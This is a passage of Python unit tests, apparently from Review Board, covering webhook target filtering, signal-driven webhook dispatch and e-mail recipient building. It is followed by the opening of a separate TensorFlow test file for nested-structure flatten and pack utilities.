ENDPOINT_URL = 'http://example.com/endpoint/'
def test_for_event(self):
"""Testing WebHookTargetManager.for_event"""
# These should not match.
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event3',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_ALL)
# These should match.
target1 = WebHookTarget.objects.create(
events='event2,event3',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='*',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
targets = WebHookTarget.objects.for_event('event3')
self.assertEqual(targets, [target1, target2])
def test_for_event_with_local_site(self):
"""Testing WebHookTargetManager.for_event with Local Sites"""
site = LocalSite.objects.create(name='test-site')
# These should not match.
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
local_site=site,
apply_to=WebHookTarget.APPLY_TO_ALL)
# This should match.
target = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
local_site=site,
apply_to=WebHookTarget.APPLY_TO_ALL)
targets = WebHookTarget.objects.for_event('event1',
local_site_id=site.pk)
self.assertEqual(targets, [target])
@add_fixtures(['test_scmtools'])
def test_for_event_with_repository(self):
"""Testing WebHookTargetManager.for_event with repository"""
repository1 = self.create_repository()
repository2 = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository2)
unused_target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target2.repositories.add(repository1)
WebHookTarget.objects.create(
events='event3',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
target2.repositories.add(repository1)
targets = WebHookTarget.objects.for_event('event1',
repository_id=repository1.pk)
self.assertEqual(targets, [target1, target2])
@add_fixtures(['test_scmtools'])
def test_for_event_with_no_repository(self):
"""Testing WebHookTargetManager.for_event with no repository"""
repository = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
WebHookTarget.objects.create(
events='event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
targets = WebHookTarget.objects.for_event('event1')
self.assertEqual(targets, [target1, target2])
def test_for_event_with_all_events(self):
"""Testing WebHookTargetManager.for_event with ALL_EVENTS"""
with self.assertRaisesMessage(ValueError,
'"*" is not a valid event choice'):
WebHookTarget.objects.for_event(WebHookTarget.ALL_EVENTS)
class WebHookSignalDispatchTests(SpyAgency, TestCase):
"""Unit tests for dispatching webhooks by signals."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def setUp(self):
super(WebHookSignalDispatchTests, self).setUp()
self.spy_on(dispatch_webhook_event, call_original=False)
@add_fixtures(['test_users'])
def test_review_request_closed_submitted(self):
"""Testing webhook dispatch from 'review_request_closed' signal
with submitted
"""
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL)
review_request = self.create_review_request(publish=True)
review_request.close(review_request.SUBMITTED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'submitted')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_request_closed_discarded(self):
"""Testing webhook dispatch from 'review_request_closed' signal
with discarded
"""
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review_request.close(review_request.DISCARDED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'discarded')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_request_published(self):
"""Testing webhook dispatch from 'review_request_published' signal"""
target = WebHookTarget.objects.create(
events='review_request_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_published')
self.assertIn('is_new', payload)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_request_reopened(self):
"""Testing webhook dispatch from 'review_request_reopened' signal"""
target = WebHookTarget.objects.create(
events='review_request_reopened',
url=self.ENDPOINT_URL)
review_request = self.create_review_request(publish=True)
review_request.close(review_request.SUBMITTED)
review_request.reopen()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_reopened')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_reopened')
self.assertEqual(payload['reopened_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_published(self):
"""Testing webhook dispatch from 'review_published' signal"""
target = WebHookTarget.objects.create(events='review_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review = self.create_review(review_request)
review.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_published')
self.assertEqual(payload['review']['id'], review.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
@add_fixtures(['test_users'])
def test_reply_published(self):
"""Testing webhook dispatch from 'reply_published' signal"""
target = WebHookTarget.objects.create(events='reply_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review = self.create_review(review_request)
reply = self.create_reply(review)
reply.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'reply_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'reply_published')
self.assertEqual(payload['reply']['id'], reply.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
class EmailUtilsTests(TestCase):
"""Testing e-mail utilities that do not send e-mails."""
def test_recipients_to_addresses_with_string_address(self):
"""Testing generating addresses from recipients with string recipients
"""
with self.assertRaises(AssertionError):
recipients_to_addresses(['foo@example.com'])
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_users(self):
"""Testing generating addresses from recipients with user recipients
"""
users = list(User.objects.filter(username__in=['doc', 'grumpy']))
addresses = recipients_to_addresses(users)
self.assertEqual(len(addresses), 2)
expected_addresses = set(
get_email_address_for_user(u)
for u in users
)
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_single_mailinglist(self):
"""Testing generating addresses from recipients that are groups with a
single mailing list address
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2@example.com'),
]
addresses = recipients_to_addresses(groups)
self.assertEqual(len(addresses), 2)
expected_addresses = set(sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[]))
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_many_mailinglist(self):
"""Testing generating addresses from recipients that are groups with
multiple mailing list addresses
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1a@example.com,group1b@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2a@example.com,group2b@example.com'),
]
addresses = recipients_to_addresses(groups)
self.assertEqual(len(addresses), 4)
expected_addresses = set(sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[]))
self.assertEqual(addresses, expected_addresses)
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_groups_and_users(self):
"""Testing generating addresses from recipients that are users and
groups with mailing list addresses
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2@example.com'),
]
users = list(User.objects.filter(username__in=['doc', 'grumpy']).all())
addresses = recipients_to_addresses(groups + users)
self.assertEqual(len(addresses), 4)
user_addresses = [
get_email_address_for_user(u)
for u in users
]
group_addresses = sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[])
self.assertEqual(addresses,
set(user_addresses + group_addresses))
def test_recipients_to_addresses_with_groups_with_members(self):
"""Testing generating addresses from recipients that are groups with
no mailing list addresses
"""
group1 = Group.objects.create(name='group1')
group2 = Group.objects.create(name='group2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
expected_addresses = set([
get_email_address_for_user(user1),
get_email_address_for_user(user2),
])
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_local_site(self):
"""Testing generating addresses from recipients that are groups in
local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
group1 = Group.objects.create(name='group1', local_site=local_site1)
group2 = Group.objects.create(name='group2', local_site=local_site2)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
def test_recipients_to_addresses_with_groups_inactive_members(self):
"""Testing generating addresses form recipients that are groups with
inactive members
"""
group1 = self.create_review_group('group1')
group2 = self.create_review_group('group2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
def test_recipients_to_addresses_groups_local_site_inactive_members(self):
"""Testing generating addresses from recipients that are groups in
local sites that have inactive members
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
group1 = self.create_review_group('group1', local_site=local_site1)
group2 = self.create_review_group('group2', local_site=local_site2)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
local_site1.users = [user1]
local_site2.users = [user2]
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
@add_fixtures(['test_users'])
def test_build_recipients_user_receive_email(self):
"""Testing building recipients for a review request where the user
wants to receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_email(self):
"""Testing building recipients for a review request where the user
does not want to receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_email = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_own_email(self):
"""Testing building recipients for a review request where the user
does not want to receive e-mail about their updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_not_receive_own_email(self):
"""Testing building recipieints for a review request where the
submitter is a reviewer and doesn't want to receive e-mail about their
updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [submitter]
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipient_user_not_receive_own_email(self):
"""Testing building recipients for a review request where the
submitter is a reviewer and doesn't want to receive e-mail about their
updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request, [submitter])
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_and_groups(self):
"""Testing building recipients for a review request where there are
target users and groups
"""
group = self.create_review_group()
user = User.objects.get(username='grumpy')
review_request = self.create_review_request()
review_request.target_people = [user]
review_request.target_groups = [group]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user]))
self.assertEqual(cc, set([submitter, group]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive_and_groups(self):
"""Testing building recipients for a review request where there are
target groups and inactive target users
"""
group = self.create_review_group()
user = User.objects.create(username='user', first_name='User',
last_name='Foo', is_active=False)
review_request = self.create_review_request()
review_request.target_people = [user]
review_request.target_groups = [group]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, group]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_groups(self):
"""Testing build recipients for a review request where there are target
groups
"""
group1 = self.create_review_group('group1')
group2 = self.create_review_group('group2')
review_request = self.create_review_request()
review_request.target_groups = [group1, group2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 3)
self.assertEqual(to, set([submitter, group1, group2]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people(self):
"""Testing building recipients for a review request with target people
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
review_request.target_people = [grumpy]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([grumpy]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive(self):
"""Testing building recipients for a review request with target people
who are inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request.target_people = [user1, user2]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_no_email(self):
"""Testing building recipients for a review request with target people
who don't receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
Profile.objects.create(user=user2, should_send_email=False)
review_request.target_people = [user1, user2]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site(self):
"""Testing building recipients for a review request where the target
people are in local sites
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site.users = [user1]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_inactive(self):
"""Testing building recipients for a review request where the target
people are in local sites and are inactive
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
local_site.users = [user1, user2]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_no_email(self):
"""Testing building recipients for a review request where the target
people are in local sites don't receieve e-mail
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
Profile.objects.create(user=user2,
should_send_email=False)
local_site.users = [user1, user2]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_limit_to(self):
"""Testing building recipients with a limited recipients list"""
dopey = User.objects.get(username='dopey')
grumpy = User.objects.get(username='grumpy')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [dopey]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[grumpy])
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_inactive(self):
"""Testing building recipients with a limited recipients list that
contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_local_site(self):
"""Testing building recipients with a limited recipients list that
contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients(self):
"""Testing building recipients with an extra recipients list"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
to, cc = build_recipients(submitter, review_request,
extra_recipients=[grumpy])
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_inactive(self):
"""Testing building recipients with an extra recipients list that
contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_local_site(self):
"""Testing building recipients with an extra recipients list that
contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to(self):
"""Testing building recipients with an extra recipients list and
a limited recipients list
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter, user2]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_inactive(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_local_site(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
local_site1.users = [user1, user3]
local_site2.users = [user2]
group = self.create_review_group()
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred(self):
"""Testing building recipients where the review request has been
starred by a user
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.starred_review_requests = [review_request]
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_inactive(self):
"""Testing building recipients where the review request has been
starred by users that may be inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_local_site(self):
"""Testing building recipients where the review request has been
starred by users that are in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utilities working with arbitrarily nested structures."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
from tensorflow.python.data.util import nest
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class NestTest(test.TestCase):
def testFlattenAndPack(self):
structure = ((3, 4), 5, (6, 7, (9, 10), 8))
flat = ["a", "b", "c", "d", "e", "f", "g", "h"]
self.assertEqual(nest.flatten(structure), [3, 4, 5, 6, 7, 9, 10, 8])
self.assertEqual(
nest.pack_sequence_as(structure, flat), (("a", "b"), "c",
("d", "e", ("f", "g"), "h")))
point = collections.namedtuple("Point", ["x", "y"])
structure = (point(x=4, y=2), ((point(x=1, y=0),),))
flat = [4, 2, 1, 0]
self.assertEqual(nest.flatten(structure), flat)
restructured_from_flat = nest.pack_sequence_as(structure, flat)
self.assertEqual(restructured_from_flat, structure)
self.assertEqual(restructured_from_flat[0].x, 4)
self.assertEqual(restructured_from_flat[0].y, 2)
self.assertEqual(restructured_from_flat[1][0][0].x, 1)
self.assertEqual(restructured_from_flat[1][0][0].y, 0)
self.assertEqual([5], nest.flatten(5))
self.assertEqual([np.array([5])], nest.flatten(np.array([5])))
self.assertEqual("a", nest.pack_sequence_as(5, ["a"]))
self.assertEqual(
np.array([5]), nest.pack_sequence_as("scalar", [np.array([5])]))
with self.assertRaisesRegexp(ValueError, "Structure is a scalar"):
nest.pack_sequence_as("scalar", [4, 5])
with self.assertRaisesRegexp(TypeError, "flat_sequence"):
nest.pack_sequence_as([4, 5], "bad_sequence")
with self.assertRaises(ValueError):
nest.pack_sequence_as([5, 6, [7, 8]], ["a", "b", "c"])
def testFlattenDictOrder(self):
"""`flatten` orders dicts by key, including OrderedDicts."""
ordered = collections.OrderedDict([("d", 3), ("b", 1), ("a", 0), ("c", 2)])
plain = {"d": 3, "b": 1, "a": 0, "c": 2}
ordered_flat = nest.flatten(ordered)
plain_flat = nest.flatten(plain)
self.assertEqual([0, 1, 2, 3], ordered_flat)
self.assertEqual([0, 1, 2, 3], plain_flat)
def testPackDictOrder(self):
"""Packing orders dicts by key, including OrderedDicts."""
ordered = collections.OrderedDict([("d", 0), ("b", 0), ("a", 0), ("c", 0)])
plain = {"d": 0, "b": 0, "a": 0, "c": 0}
seq = [0, 1, 2, 3]
ordered_reconstruction = nest.pack_sequence_as(ordered, seq)
plain_reconstruction = nest.pack_sequence_as(plain, seq)
self.assertEqual(
collections.OrderedDict([("d", 3), ("b", 1), ("a", 0), ("c", 2)]),
ordered_reconstruction)
self.assertEqual({"d": 3, "b": 1, "a": 0, "c": 2}, plain_reconstruction)
def testFlattenAndPackWithDicts(self):
# A nice messy mix of tuples, lists, dicts, and `OrderedDict`s.
named_tuple = collections.namedtuple("A", ("b", "c"))
mess = (
"z",
named_tuple(3, 4),
{
"c": (
1,
collections.OrderedDict([
("b", 3),
("a", 2),
]),
),
"b": 5
},
17
)
flattened = nest.flatten(mess)
self.assertEqual(flattened, ["z", 3, 4, 5, 1, 2, 3, 17])
structure_of_mess = (
14,
named_tuple("a", True),
{
"c": (
0,
collections.OrderedDict([
("b", 9),
("a", 8),
]),
),
"b": 3
},
"hi everybody",
)
unflattened = nest.pack_sequence_as(structure_of_mess, flattened)
self.assertEqual(unflattened, mess)
# Check also that the OrderedDict was created, with the correct key order.
unflattened_ordered_dict = unflattened[2]["c"][1]
self.assertIsInstance(unflattened_ordered_dict, collections.OrderedDict)
self.assertEqual(list(unflattened_ordered_dict.keys()), ["b", "a"])
